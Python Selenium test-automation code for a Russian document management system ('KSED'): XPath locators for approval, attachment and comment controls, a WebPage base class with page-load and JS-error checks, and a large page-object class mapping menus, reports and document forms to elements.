checkBoxFirst = '(//input[@name = "fileChecked"])[1]' #Первый чекбокс в списке
butAct = '(//button[text() = "Действия с выбранными"])[2]' #Кнопка действия с выбором
butAct_2 = '(//button[text() = "Действия с выбранными"])' # Кнопка действия с выбором
butExp ='(//button[text() = "Экспорт"])[2]' #Кнопка экспорта
butExp_2 = '(//button[text() = "Экспорт"])' # Кнопка экспорта
butFavorite = '//a [text() = "Добавить в избранное"]' #Кнопка добавить в избранное
butOK = '//button[text() = "Ок"]' #Кнопка OK добавить в избранное
butSelExp = '(//a[text() = "Выгрузить выбранные"])' #Кнопка экспорта выбранного
# Карточка согласования
kurator = '// input[contains( @ id, "document-approval_curators-assoc-cntrl-autocomplete-input")]'#xpath # куратор
viewSelecton = '//span[contains(@class, "-push-button")][contains(@id, "document-approval_document-kind-assoc-cntrl-tree-picker")]' # xpath # вид документа
proUpLevel = '//button[contains(@id, "document-approval_pvu-assoc-cntrl-tree-picker-button-button")]' # xpath # процессы верхнего уровня
viewLndSelecton = '//button[contains(@id, "document-approval_lnd-kind-assoc-cntrl-tree-picker-button-button")]' # xpath # вид документа
rdSelecton = '// span[text() = "РД"]' # xpath # выбор РД
lndSelecton = '// span[text() = "ЛНД"]' # xpath # выбор ЛНД
etcSelecton = '// span[text() = "Прочие"]' # xpath # выбор Прочие
levelFirst = '// span[text() = "1-й иерархический уровень"]' # xpath # выбор уровня
levelFirst_1 = '//input[contains(@id, "rn-document-approval_pvu-assoc-cntrl-autocomplete-input")]' # xpath # ввод в поле вернего уровня
btnSelection4 = '(//span[contains(@class, "addIcon")])[4]' # xpath # Кнопка + четвертый выбор
btnContinium = '//button[text() = "Продолжить"]' # кнопка продолжить
titleCS = '//input[contains(@name, "prop_lecm-document_title")]' # xpath # заголовок
saveProject = '//button[text() = "Сохранить проект"]' # xpath # сохранить проект
btnAddPerson = '(//a[contains(@title, "Добавить")])[1]' # xpath # добавить сотрудника
btnAddPerson_2 = '(//span[text() = "Добавить сотрудника"]//parent::a[contains(@id, "onActionAddEmployee")])[1]'
reserchInput = '//input[contains(@id, "employee-search-text")]' # строка поиска
zamechSogl = '(//div[contains(@class, "annotation-comment")])' # комментарии
statusSogl = '//a[contains(@onclick, "ApprovalResult")]' # cтатус согласования
statusSogl_2 ='//a[contains(@class,"approval-approved-status")]' # cтатус согласования
rejectSogl = '//div[contains(text(), "Отозвать с согласования")]' # кнопка отозвать с согласования
reasonReject = '//textarea[@title = "Причина"]' # причина отказа / отзыва
btnAction = '//button[contains(@id, "-attachment-actions-button-button")]' # кнопка действие
downLoadNewVersion = '//a[text() = "Загрузить новую версию"]' # кнопка загрузить новую версию
bntVersion = '//button[text() = "Версии"]' # кнопка версия
btnInApp = '//button[contains(@id, "start_internal_approval-button")]'# кнопка внутреннего согласования
btnInApp_2 ='//button[contains(@id, "_internal_approval")]'# кнопка внутреннего согласования
employeeForSogl = '//input[contains(@id, "employeeAssoc-cntrl-autocomplete-input")]' # поле сотрудники
btnRejectInnerSogl = '//div[@title = "Отозвать внутреннее согласование"]' # кнопка отозвать внутреннее согласование
statusInner = '(//div[contains(@class,"approver-item-status")])[2]' # статус внутреннего согласования
statusInner_2 = '(//div[contains(@class,"approver-item-status")])[1]' # статус внутреннего согласования
statusInner_3 = '//a[contains(@onclick,"viewApprovalResult")]'# статус внутреннего согласования
statusInner_4 = '(//div[contains(@class,"approver-decision-no-decision")])[2]'
navedTaskInnerSogl = '(//div[text() = "Выполняется"])[1]' # для наведения на задачу согласования внутреннего
btnRjctTaskInnerApp = '(//a[contains(@title, "Отозвать")])[1]' # кнопка отозвать задачу согласования внутреннего
btnAddAtt = '//button[contains(@id, "attachment-add-button")]' # кнопка добавить вложение
bntDocForRassmotr = '//a[text() = "Документы для рассмотрения"]' # кнопка добавить вложение для рассморения
elmDownloaded = '//a[@class = "text-cropped" and contains(string(), "Doc.docx")]' # добавленное вложение
btnAddComment = '//button[@title = "Замечание"]' # кнопка добавления замечаний
areaComment = '//textarea[contains(@id, "approval-annotation_comment")] '# замечания
checkComment = '(//div[@class ="rn-approval-annotations"]//div[@class = "annotation-comment"])[1]' # проверка комментариев
returnDecision = '//div[contains(@title, "Отозвать решение")]' # кнопка отзыв решения
softDecision = '//div[contains(@title, "Смягчить решение")]' # кнопка смягчитьрешение
takeTasks = '//div[contains(@class, "widget-button-grey")][contains(text(), "Забрать задачу")]' # кнопка забрать задачу
backTasks = '//div[contains(@class, "widget-button-grey")][contains(text(), "Вернуть задачу")]' # кнопка вернуть задачу
infoMassage = '(//div[@class = "bd"])[1]' # информационное сообщение
butDelComment = '//div[@title = "Удалить"]' # кнопка удаления комментариев
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# TODO: write article about __elements nasledovanie hack.
# TODO: switch to iframe
# TODO: overlapping elements ???
# TODO: add right click
import time
from KSED.elements import WebElement, ManyWebElements
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
#from utils import KNOWN_JS_ISSUES
from termcolor import colored
from KSED.TestData.locators import KSEDLocators
class WebPage(object):
_web_driver = 'my web driver'
def __init__(self, web_driver, url=''):
self._web_driver = web_driver
self.get(url)
def __setattr__(self, name, value):
if not name.startswith('_'):
self.__getattribute__(name)._set_value(self._web_driver, value)
else:
super(WebPage, self).__setattr__(name, value)
def __getattribute__(self, item):
attr = object.__getattribute__(self, item)
if not item.startswith('_') and not callable(attr):
attr._web_driver = self._web_driver
return attr
def get(self, url):
self._web_driver.get(url)
self.wait_page_loaded()
def go_back(self):
self._web_driver.back()
self.wait_page_loaded()
def refresh(self):
self._web_driver.refresh()
self.wait_page_loaded()
def screenshot(self, file_name='screenshot.png'):
self._web_driver.screenshot(file_name)
def scroll_down(self, offset=0):
""" Scroll the page down. """
if offset:
self._web_driver.execute_script('window.scrollTo(0, {0});'.format(offset))
else:
self._web_driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')
def scroll_up(self, offset=0):
""" Scroll the page up. """
if offset:
self._web_driver.execute_script('window.scrollTo(0, -{0});'.format(offset))
else:
self._web_driver.execute_script('window.scrollTo(0, -document.body.scrollHeight);')
def switch_to_iframe(self, iframe):
""" Switch to iframe by it's name. """
self._web_driver.switch_to.frame(iframe)
def switch_out_iframe(self):
""" Cancel iframe focus. """
self._web_driver.switch_to.default_content()
def get_current_url(self):
""" Returns current browser URL. """
return self._web_driver.current_url
def get_page_source(self):
""" Returns current page body. """
source = ''
try:
source = self._web_driver.page_source
except:
print(colored('Con not get page source', 'red'))
return source
def check_js_errors(self, ignore_list=None):
""" This function checks JS errors on the page. """
ignore_list = ignore_list or []
logs = self._web_driver.get_log('browser')
for log_message in logs:
if log_message['level'] != 'WARNING':
ignore = False
for issue in ignore_list:
if issue in log_message['message']:
ignore = True
break
assert ignore, 'JS error "{0}" on the page!'.format(log_message)
def wait_page_loaded(self, timeout=60, check_js_complete=True,
check_page_changes=True, check_images=False,
wait_for_element=None,
wait_for_xpath_to_disappear='',
long_sleep=2):
""" This function waits until the page will be completely loaded.
We use many different ways to detect is page loaded or not:
1) Check JS status
2) Check modification in source code of the page
3) Check that all images uploaded completely
(Note: this check is disabled by default)
4) Check that expected elements presented on the page
"""
page_loaded = False
double_check = False
k = 0
if long_sleep:
time.sleep(long_sleep)
# Get source code of the page to track changes in HTML:
source = ''
try:
source = self._web_driver.page_source
except:
pass
# Wait until page loaded (and scroll it, to make sure all objects will be loaded):
while not page_loaded:
time.sleep(0.5)
k += 1
if check_js_complete:
# Scroll down and wait when page will be loaded:
try:
self._web_driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')
page_loaded = self._web_driver.execute_script("return document.readyState == 'complete';")
except:
pass
if page_loaded and check_page_changes:
# Check if the page source was changed
new_source = ''
try:
new_source = self._web_driver.page_source
except:
pass
page_loaded = new_source == source
source = new_source
# Wait when some element will disappear:
if page_loaded and wait_for_xpath_to_disappear:
bad_element = None
try:
bad_element = WebDriverWait(self._web_driver, 0.1).until(
EC.presence_of_element_located((By.XPATH, wait_for_xpath_to_disappear))
)
except:
pass # Ignore timeout errors
page_loaded = not bad_element
if page_loaded and wait_for_element:
try:
page_loaded = WebDriverWait(self._web_driver, 0.1).until(
EC.element_to_be_clickable(wait_for_element._locator)
)
except:
pass # Ignore timeout errors
assert k < timeout, 'The page loaded more than {0} seconds!'.format(timeout)
# Check two times that page completely loaded:
if page_loaded and not double_check:
page_loaded = False
double_check = True
# Go up:
self._web_driver.execute_script('window.scrollTo(document.body.scrollHeight, 0);')
class MPages(WebPage):
melements = WebElement(xpath='//div[contains(@class, "shown")]//span[contains(text(), "Отчеты по исполнительской дисциплине")]')
m2elements = WebElement(xpath='//a[contains(text(), "Состояние исполнения резолюций")]')
# Форма авторизации
username_text = WebElement(name=KSEDLocators.username_text) # Логин
password_text = WebElement(name=KSEDLocators.password_text) # Пароль
LogIn_button = WebElement(xpath=KSEDLocators.LogIn_button) # Кнопка "Войти"
# *******СТРОКА МЕНЮ*******
ksed = WebElement(xpath=KSEDLocators.ksed) #xpath # КСЭД
barcode_search = WebElement(id_=KSEDLocators.barcode_search) #id # Поиск по ШК
search_bc = WebElement(xpath=KSEDLocators.search_bc) # Строка поиска по ШК
more_menu = WebElement(id_=KSEDLocators.more_menu)# Меню "Ещё"
ksed_in_more_m = WebElement(id_=KSEDLocators.ksed_in_more_m) # КСЭД в меню "Ещё"
Company_dir = WebElement(xpath=KSEDLocators.Company_dir) # Справочник организации
admin = WebElement(xpath=KSEDLocators.admin) # Администрирование
transfer = WebElement(xpath=KSEDLocators.transfer) # Передача дел
arm_arh = WebElement(xpath=KSEDLocators.arm_arh) # АРМ Архивное дело
verify = WebElement(xpath=KSEDLocators.verify) # Верификация
scanner = WebElement(xpath=KSEDLocators.scanner) # Работа со сканером ШК
notification = WebElement(id_=KSEDLocators.notification) # Уведомления
notificationProtokol = WebElement(xpath=KSEDLocators.notificationProtokol) # Первое в списке уведомление о протоколе
notificationFirst = WebElement(xpath=KSEDLocators.notificationFirst) # id # Уведомление первое в списке
# *******МЕНЮ ПОЛЬЗОВАТЕЛЯ*******
user_menu = WebElement(xpath=KSEDLocators.user_menu) # Меню пользователя
USER_LOGOUT = WebElement(xpath=KSEDLocators.USER_LOGOUT) # Выход из системы
my_profile = WebElement(xpath=KSEDLocators.my_profile) # Пункт меню "Мой профиль"
fieldlabel = WebElement(xpath=KSEDLocators.fieldlabel) # Должность в области краткой информации
btnEdit_profile = WebElement(xpath=KSEDLocators.btnEdit_profile) # Кнопка "Изменить профиль"
inputPosition = WebElement(xpath=KSEDLocators.inputPosition) # Поле ввода должности
logic_ESM = WebElement(xpath=KSEDLocators.logic_ESM) # Пункт меню "Логика ECM. Мой профиль"
autoAnswerText = WebElement(name=KSEDLocators.autoAnswerText) # Текст автоответа (Меня нет в офисе)
btnCancelAbsence = WebElement(xpath=KSEDLocators.btnCancelAbsence) # Кнопка "Отменить отсутствие"
btnYes = WebElement(xpath=KSEDLocators.btnYes) # Кнопка "Да" (отменить отсутствие)
edit_password = WebElement(xpath=KSEDLocators.edit_password) # Пункт меню "Изменить пароль"
inputOldPassword = WebElement(xpath=KSEDLocators.inputOldPassword) # Введите старый пароль
inputNewPassword1 = WebElement(xpath=KSEDLocators.inputNewPassword1) # Введите старый пароль
inputNewPassword2 = WebElement(xpath=KSEDLocators.inputNewPassword2) # Введите старый пароль
btnOKchange = WebElement(xpath=KSEDLocators.btnOKchange) # Кнопка "Изменить пароль"
# *******ЛЕВАЯ ЧАСТЬ СТРАНИЦЫ (Кнопка "Создать" и разделы)*******
newDoc_button = WebElement(xpath=KSEDLocators.newDoc_button) # "Создать"
protocol = WebElement(xpath=KSEDLocators.protocol) # Протокол
rd = WebElement(xpath=KSEDLocators.rd) # РД
reestr = WebElement(xpath=KSEDLocators.reestr) # Реестр
poruchenie = WebElement(xpath=KSEDLocators.poruchenie) # Поручение
cardSogl = WebElement(xpath=KSEDLocators.cardSogl) # Карточка согласования
resolution = WebElement(xpath=KSEDLocators.resolution) # Резолюция
SZ = WebElement(xpath=KSEDLocators.SZ) # Служебная записка
proizvDoc = WebElement(xpath=KSEDLocators.proizvDoc) # Произвольный документ
paket_vh = WebElement(xpath=KSEDLocators.paket_vh) #Пакет Вх. кор.
vhDoc = WebElement(xpath=KSEDLocators.vhDoc) # Входящий документ
ishDoc = WebElement(xpath=KSEDLocators.ishDoc) # Исходящий документ
# РАЗДЕЛЫ
myWork = WebElement(xpath=KSEDLocators.myWork) # Моя работа
expedition = WebElement(xpath=KSEDLocators.expedition) # Экспедиция
navigation = WebElement(xpath=KSEDLocators.navigation) # Навигатор
allur = WebElement(xpath=KSEDLocators.allur) # Отчеты
workReg = WebElement(xpath=KSEDLocators.workReg) # Работа регистратора
medo = WebElement(xpath=KSEDLocators.medo) # МЭДО
mySearch = WebElement(xpath=KSEDLocators.mySearch) # Мои поисковые запросы
poiskzapr = WebElement(xpath=KSEDLocators.poiskzapr) # Поисковые запросы
myPoiskZapr = WebElement(xpath=KSEDLocators.myPoiskZapr) # Поисковые запросы
ControlZapr = WebElement(xpath=KSEDLocators.ControlZapr) # Упарвление поисковыми запросами
btnPlus = WebElement(xpath=KSEDLocators.btnPlus) # кнопка развернуть в моих запросах
# ОБЛАСТЬ ПРОСМОТРА (КСЭД)
oblProsm = WebElement(xpath=KSEDLocators.oblProsm) # Область просмотра
oneDocInList = WebElement(xpath=KSEDLocators.oneDocInList) # Первый документ в списке
nineDocInList = WebElement(xpath=KSEDLocators.nineDocInList) # Девятый документ в списке
subordinate = ManyWebElements(xpath=KSEDLocators.subordinate) # "+" раскрытие подчиненные документы
oneSubordInList = WebElement(xpath=KSEDLocators.oneSubordInList) # Первая ссылка на подчиненный документ
ActionTab = WebElement(xpath=KSEDLocators.ActionTab) # Кнопка "Действия с выбранными"
chBinOnl = WebElement(xpath=KSEDLocators.chBinOnl)
# Моя работа
WorkImmid = WebElement(xpath=KSEDLocators.WorkImmid) # xpath # Моя работа - срочные
connectedDoc = WebElement(xpath=KSEDLocators.connectedDoc) # xpath # связанные документы
# ОТЧЕТЫ
section_allur = WebElement(xpath=KSEDLocators.section_allur) # Раздел "Отчеты"
node_Logs = WebElement(xpath=KSEDLocators.node_Logs) # "Журналы"
node_Statis = WebElement(xpath=KSEDLocators.node_Statis) # "Статистические отчеты"
edsBykindStat = WebElement(xpath=KSEDLocators.edsBykindStat) # Отчет "Сводка по видам документов"
node_ispDisp = WebElement(xpath=KSEDLocators.node_ispDisp) #
logs_incDoc = WebElement(xpath=KSEDLocators.logs_incDoc)
incomingRegJournal = WebElement(xpath=KSEDLocators.incomingRegJournal) # Отчет "Журнал регистрации входящих документов"
logs_outDoc = WebElement(xpath=KSEDLocators.logs_outDoc)
outgoingRegistration = WebElement(xpath=KSEDLocators.outgoingRegistration) # Отчет "Журнал регистрации исходящих документов"
logs_raspDoc = WebElement(xpath=KSEDLocators.logs_raspDoc)
ordRegJournal = WebElement(xpath=KSEDLocators.ordRegJournal) # Отчет "Журнал регистрации Распорядительных документов"
logs_sluDoc = WebElement(xpath=KSEDLocators.logs_sluDoc)
internalRegJournal = WebElement(xpath=KSEDLocators.internalRegJournal) # Отчет "Журнал регистрации служебных записок"
stat_specDoc = WebElement(xpath=KSEDLocators.stat_specDoc)
stat_temDoc = WebElement(xpath=KSEDLocators.stat_temDoc)
edsBySubjectStat = WebElement(xpath=KSEDLocators.edsBySubjectStat) # Отчет "Сводка по тематикам документов"
stat_temDocO = WebElement(xpath=KSEDLocators.stat_temDocO)
edsBySubjectStatO = WebElement(xpath=KSEDLocators.edsBySubjectStatO) # Отчет "Сводка по тематикам документов(объед)"
stat_tipDoc = WebElement(xpath=KSEDLocators.stat_tipDoc)
edByTypeStat = WebElement(xpath=KSEDLocators.edByTypeStat) # Отчет "Сводка по типам документов"
allu_ispIncDoc = WebElement(xpath=KSEDLocators.allu_ispIncDoc)
allu_raspDoc = WebElement(xpath=KSEDLocators.allu_raspDoc)
allu_sluDoc = WebElement(xpath=KSEDLocators.allu_sluDoc)
allu_ispDis = WebElement(xpath=KSEDLocators.allu_ispDis)
allu_ispDispA = WebElement(xpath=KSEDLocators.allu_ispDispA)
allu_NispDI = WebElement(xpath=KSEDLocators.allu_NispDI)
allu_NispDIrg = WebElement(xpath=KSEDLocators.allu_NispDIrg)
allu_istS = WebElement(xpath=KSEDLocators.allu_istS)
allu_narS = WebElement(xpath=KSEDLocators.allu_narS)
allu_prodIsp = WebElement(xpath=KSEDLocators.allu_prodIsp)
allu_prodPodr = WebElement(xpath=KSEDLocators.allu_prodPodr)
allu_ReesContr = WebElement(xpath=KSEDLocators.allu_ReesContr)
allu_ReesContrN = WebElement(xpath=KSEDLocators.allu_ReesContrN)
allu_ReesContrF = WebElement(xpath=KSEDLocators.allu_ReesContrF)
allu_SostIspR = WebElement(xpath=KSEDLocators.allu_SostIspR)
# *******РАБОТА С ДОКУМЕНТАМИ*******
# ОБЩИЕ АТРИБУТЫ
#(форма создания документа)
title = WebElement(name=KSEDLocators.title) # Заголовок
category_doc = WebElement(xpath=KSEDLocators.category_doc) # Категория документа
doc_type = WebElement(xpath=KSEDLocators.doc_type) # Вид документа(кнопка выбора)
doc_typeInp = WebElement(xpath=KSEDLocators.doc_typeInp) # Вид документа(поле ввода)
btnOKDT = WebElement(xpath=KSEDLocators.btnOKDT) # Вид документа (кнопка "ОК")
podpisant = WebElement(xpath=KSEDLocators.podpisant) # Подписант(ы)
sposob_dost = WebElement(xpath=KSEDLocators.sposob_dost) # Способ доставки
btnCreateDoc = WebElement(xpath=KSEDLocators.btnCreateDoc) # Кнопка "Создать"
adresat = WebElement(xpath=KSEDLocators.adresat) # Адресат
korrespondent = WebElement(xpath=KSEDLocators.korrespondent) # Корреспондент
# (карточка документа)
attachments = WebElement(xpath=KSEDLocators.attachments) # # Переход во вкладку "Вложения"
vlozheniya = WebElement(xpath=KSEDLocators.vlozheniya) # Вложения (раскрытие раздела)
remarks = WebElement(xpath=KSEDLocators.remarks) # замечания
remarksBtn = WebElement(xpath=KSEDLocators.remarksBtn) # замечания
osnSvedeniya = WebElement(xpath=KSEDLocators.osnSvedeniya) # Основные сведения (раскрытие раздела)
printForm = WebElement(xpath=KSEDLocators.printForm)# Печатные формы (раскрытие раздела)
printBarCode = WebElement(xpath=KSEDLocators.printBarCode) #Печатная форма штрих кода документа
btnPrintInPrintForm = WebElement(id_=KSEDLocators.btnPrintInPrintForm)# Кнопка печати в окне печатной формы
btnOKpodpis = WebElement(xpath=KSEDLocators.btnOKpodpis) # Кнопка ОК подтверждение подписания
mode = WebElement(xpath=KSEDLocators.mode) # Переключение в двупанельный вид
fileUpload = WebElement(xpath=KSEDLocators.fileUpload) # Загрузить файл
fileUpload2 = WebElement(xpath=KSEDLocators.fileUpload2) # Загрузить файл в поручении
fileUpload3 = WebElement(xpath=KSEDLocators.fileUpload3) # Загрузить файл в поручении
fileUpload4 = WebElement(xpath=KSEDLocators.fileUpload4) # Загрузить файл в поручении
files = WebElement(xpath=KSEDLocators.files) # Выберите файлы
show = WebElement(xpath=KSEDLocators.show) # Показать общую карточка
dropBtn = WebElement(xpath=KSEDLocators.dropBtn) # Кнопка выпадающего списка
dropBtn_2 = WebElement(xpath=KSEDLocators.dropBtn_2) # Кнопка выпадающего списка
resultSogl = WebElement(xpath=KSEDLocators.resultSogl) # Результат согласования
show_list = WebElement(xpath=KSEDLocators.show_list)# Показать ввиде списка
btnPrint = WebElement(xpath=KSEDLocators.btnPrint) # Кнопка печати в форме предварительного просмотра вложения
soglasovanieWkladka = WebElement(xpath=KSEDLocators.soglasovanieWkladka) # Вкладка "Согласование"
soglasovanieWkladka2 = WebElement(xpath=KSEDLocators.soglasovanieWkladka2) # Вкладка "Согласование"
createRuleBtn = WebElement(xpath=KSEDLocators.createRuleBtn) # Кнопка "Создать маршрут"
createRuleIndivid = WebElement(xpath=KSEDLocators.createRuleIndivid) # "Индивидуальный маршрут"
addEtap = WebElement(xpath=KSEDLocators.addEtap) # Кнопка "Добавить этап"
tipeEtap = WebElement(xpath=KSEDLocators.tipeEtap) # "Вид этапа"
soglasuychie = WebElement(xpath=KSEDLocators.soglasuychie) # "Согласующие"
btnOKformSogl = WebElement(xpath=KSEDLocators.btnOKformSogl) # Кнопка "ОК" на форме добавления этапа согласования
punkti = WebElement(xpath=KSEDLocators.punkti) # Вкладка "Пункты"
punktiBtn = WebElement(xpath=KSEDLocators.punktiBtn) # Кнопка "Пункты"
punktPoruch = WebElement(xpath=KSEDLocators.punktPoruch) # Пункт/Поручение
textPoruch = WebElement(xpath=KSEDLocators.textPoruch) # Текст поручения
tipPoruch = WebElement(xpath=KSEDLocators.tipPoruch) # Тип поручения
otvetstv_ispolnVpunktah = WebElement(xpath=KSEDLocators.otvetstv_ispolnVpunktah) # Ответственный исполнитель в пунктах карточки документа
srokIspoln = WebElement(xpath=KSEDLocators.srokIspoln) # Срок исполнения (среднее знач)
btnOKform = WebElement(xpath=KSEDLocators.btnOKform) # Кнопка ОК на форме
sendFor_approval = WebElement(xpath=KSEDLocators.sendFor_approval) # Действие "Направить на согласование"
sendFor_podpis = WebElement(xpath=KSEDLocators.sendFor_podpis) # Действие "Направить на подписание"
sendFor_execution = WebElement(xpath=KSEDLocators.sendFor_execution) # Действие "Направить на исполнение"
btnOKnaprNaIspoln = WebElement(xpath=KSEDLocators.btnOKnaprNaIspoln) # Кнопка "ОК" на форме подтверждения действия "Направить на исполнение"
confirm = WebElement(xpath=KSEDLocators.confirm) # Подтверждение согласования
confirm2 = WebElement(xpath=KSEDLocators.confirm2) # Подтверждение согласования
confirm_3 = WebElement(xpath=KSEDLocators.confirm_3) # Подтверждение согласования
confirm_4 = WebElement(xpath=KSEDLocators.confirm_4) # Подтверждение согласования
confirm_5 = WebElement(xpath=KSEDLocators.confirm_5) # Подтверждения выбора
confirm_6 = WebElement(xpath=KSEDLocators.confirm_6) # Подтверждения выбора
confirm_7 = WebElement(xpath=KSEDLocators.confirm_7) # Подтверждения выбора
confirm_8 = WebElement(xpath=KSEDLocators.confirm_8) # Подтверждения выбора
confirm_9 = WebElement(xpath=KSEDLocators.confirm_9) # Подтверждения выбора
btnTree = WebElement(xpath=KSEDLocators.btnTree) # Кнопка ...
btnSelection3 = WebElement(xpath=KSEDLocators.btnSelection3) # Кнопка 3 выбора
btnSelection_3 = WebElement(xpath=KSEDLocators.btnSelection_3) # Кнопка 3 выбора
btnSelection_4 = WebElement(xpath=KSEDLocators.btnSelection_4) # Кнопка 3 выбора
btnSelection_1 = WebElement(xpath=KSEDLocators.btnSelection_1) # Кнопка 1 выбор
btnSelection1 = WebElement(xpath=KSEDLocators.btnSelection1) # Кнопка 1 выбор
btnSelection_5 = WebElement(xpath=KSEDLocators.btnSelection_5) # Кнопка 27 выбор
status_Doc = WebElement(xpath=KSEDLocators.status_Doc) # Статус документа во вкладке (Основные сведения)
status_Doc_1 = WebElement(xpath=KSEDLocators.status_Doc_1) # Статус документа во вкладке (Основные сведения)
#"Отправить отчет"
actionSendAllere = WebElement(xpath=KSEDLocators.actionSendAllere) # "Отправить отчет" действие
btnSend = WebElement(xpath=KSEDLocators.btnSend) # Кнопка "Отправить"
textAllur = WebElement(xpath=KSEDLocators.textAllur) # Текстовое поле "Текст отчета"
btnAddSvyz = WebElement(xpath=KSEDLocators.btnAddSvyz) # Кнопка добавления связи "..."
searchDoc = WebElement(xpath=KSEDLocators.searchDoc) # Строка поиска в форме подбора
oneListEl = WebElement(xpath=KSEDLocators.oneListEl) # Первый элемент в списке справочника
btnOK = WebElement(xpath=KSEDLocators.btnOK) # Кнопка "ОК" в форме подбора
# (панель согласования)
APPROVED_button = WebElement(xpath=KSEDLocators.APPROVED_button) # Кнопка "Согласовать"
APPROVED_WITH_REMARK_button = WebElement(xpath=KSEDLocators.APPROVED_WITH_REMARK_button) # Кнопка "Согласовать с комментариями"
REJECTED_button = WebElement(xpath=KSEDLocators.REJECTED_button) # Кнопка "Отклонить"
internal_approval = WebElement(xpath=KSEDLocators.internal_approval) # Кнопка "Внутреннее согласование"
prop_bpm_comment = WebElement(xpath=KSEDLocators.prop_bpm_comment) # Поле комментария
prop_bpm_comment_sogl = WebElement(xpath=KSEDLocators.prop_bpm_comment) # Поле комментария
apply_button_button = WebElement(xpath=KSEDLocators.apply_button_button) # Кнопка "ОК" при вынесении решения согласования
apply_button_button2 = WebElement(xpath=KSEDLocators.apply_button_button2) # Кнопка "ОК" при вынесении решения согласования
SIGNED_button = WebElement(xpath=KSEDLocators.SIGNED_button) # Кнопка "Подписать"
# # ПРОТОКОЛ
# #(форма создания документа)
# addEl = WebElement(xpath=KSEDLocators.addEl) # Вид документа(Протокол совещания рабочей группы)
# addEl2 = WebElement(xpath=KSEDLocators.addEl2) #Вид документа "Служебная записка"
# РАСПОРЯДИТЕЛЬНЫЙ ДОКУМЕНТ
#(форма создания документа)
addEl = WebElement(xpath=KSEDLocators.addEl) # Вид документа(Протокол совещания рабочей группы)
addEl2 = WebElement(xpath=KSEDLocators.addEl2) #Вид документа "Служебная записка"
preambula = WebElement(xpath=KSEDLocators.preambula) # Преамбула
obcontrol = WebElement(xpath=KSEDLocators.obcontrol) # Общий контроль
wid_doc = WebElement(xpath=KSEDLocators.wid_doc) # Вид документа (в РД)
wid_doc_rasp = WebElement(xpath=KSEDLocators.wid_doc_rasp) # Вид документа РД (Распоряжение)
addPunkt = WebElement(xpath=KSEDLocators.addPunkt) # Кнопка "Добавить пункт"
textPunktaRD = WebElement(name=KSEDLocators.textPunktaRD) # Текст пункта РД
otvetstv_ispolnVpunktahRD = WebElement(xpath=KSEDLocators.otvetstv_ispolnVpunktahRD) # Ответственный исполнитель в пункте РД
rassilka = WebElement(xpath=KSEDLocators.rassilka) # Вкладка "Рассылка"
btnVipolnit = WebElement(xpath=KSEDLocators.btnVipolnit) # Кнопка "Выполнить..."
punktBtnVipolnit = WebElement(xpath=KSEDLocators.punktBtnVipolnit) # Создать и заполнить
# ПРОТОКОЛ
#(форма создания документа)
date = WebElement(xpath=KSEDLocators.date) # Дата совещания
category = WebElement(xpath=KSEDLocators.category) # Категория
Chairman = WebElement(xpath=KSEDLocators.Chairman) # Председатель
Secretary = WebElement(xpath=KSEDLocators.Secretary) # Секретарь
person_present = WebElement(xpath=KSEDLocators.person_present) # Присутствовали
#РЕЕСТР
#(форма создания документа)
vid_reestra = WebElement(xpath=KSEDLocators.vid_reestra) # Вид реестра
vid_reestraPR = WebElement(xpath=KSEDLocators.vid_reestraPR) # Вид реестра (Передачи на рег..)
vid_reestraPP = WebElement(xpath=KSEDLocators.vid_reestraPP) # Вид реестра (Приема/передачи)
btnCreateChern = WebElement(xpath=KSEDLocators.btnCreateChern) # Кнопка "Создать черновик"
btnCreateSend = WebElement(xpath=KSEDLocators.btnCreateSend) # Кнопка "Создать и отправить"
inpDoc = WebElement(xpath=KSEDLocators.inpDoc) # Поле "Документы"
poluchatel = WebElement(xpath=KSEDLocators.poluchatel) # Поле "Получатель"
# СЛУЖЕБНАЯ ЗАПИСКА
#(форма создания документа)
adresati = WebElement(xpath=KSEDLocators.adresati) # Адресаты
podpisanti = WebElement(xpath=KSEDLocators.podpisanti) # Подписанты
# ПРОИЗВОЛЬНЫЙ ДОКУМЕНТ
#(форма создания документа)
prorabotka = WebElement(xpath=KSEDLocators.prorabotka) # Проработка
chBprorab = WebElement(xpath=KSEDLocators.chBprorab) # чекбокс проработка
normokontrol = WebElement(xpath=KSEDLocators.normokontrol) # Нормоконтроль
chBnorm = WebElement(xpath=KSEDLocators.chBnorm) # чекбокс Проработка
soglasovanie = WebElement(xpath=KSEDLocators.soglasovanie) # Согласование
podpisanie = WebElement(xpath=KSEDLocators.podpisanie) # Подписание
utverzhdenie = WebElement(xpath=KSEDLocators.utverzhdenie) # Утверждение
oznakomlenie = WebElement(xpath=KSEDLocators.oznakomlenie) # Ознакомление
# ПОРУЧЕНИЕ
# (форма создания документа)
tipPoruch = WebElement(xpath=KSEDLocators.tipPoruch) # Тип поручения
text_poruch = WebElement(name=KSEDLocators.text_poruch) #Текст поручения
otvetstv_ispoln = WebElement(xpath=KSEDLocators.otvetstv_ispoln) # Ответственный исполнитель
# ПАКЕТ ВХОДЯЩЕЙ КОРРЕСПОНДЕНЦИИ
# ВХОДЯЩИЙ ДОКУМЕНТ
#(форма создания документа)
ishNumber = WebElement(name=KSEDLocators.ishNumber) # Исходящий номер
dateIS = WebElement(xpath=KSEDLocators.dateIS) # Дата исходящего
# ИСХОДЯЩИЙ ДОКУМЕНТ
# (форма создания документа)
osnovPodpis = WebElement(name=KSEDLocators.osnovPodpis) # Основание подписания
korrespondentISH = WebElement(xpath=KSEDLocators.korrespondentISH) # Корреспондент
clickNull = WebElement(xpath=KSEDLocators.clickNull) # КЛИК ВНЕ АТРИБУТОВ
#Формы отчетов
#Мои поисковые запросы
listChange = WebElement(xpath=KSEDLocators.listChange) # Выпадающий список
listChangeSZ = WebElement(xpath=KSEDLocators.listChangeSZ) # Выпадающий список - служебная записка
listChangeRD = WebElement(xpath=KSEDLocators.listChangeRD) # Выпадающий список - РД
butSave = WebElement(xpath=KSEDLocators.butSave) #Кнопка сохранить
nameZap = WebElement(xpath=KSEDLocators.nameZap) #Наименование запроса
zaprosToDel = WebElement(xpath=KSEDLocators.zaprosToDel)#созданный запрос
butDel = WebElement(xpath=KSEDLocators.butDel) #Кнопка удалить
butRed = WebElement(xpath=KSEDLocators.butRed) # Кнопка редактировать
butDelAc = WebElement(xpath=KSEDLocators.butDelAc) # Кнопка удалить подтверждение
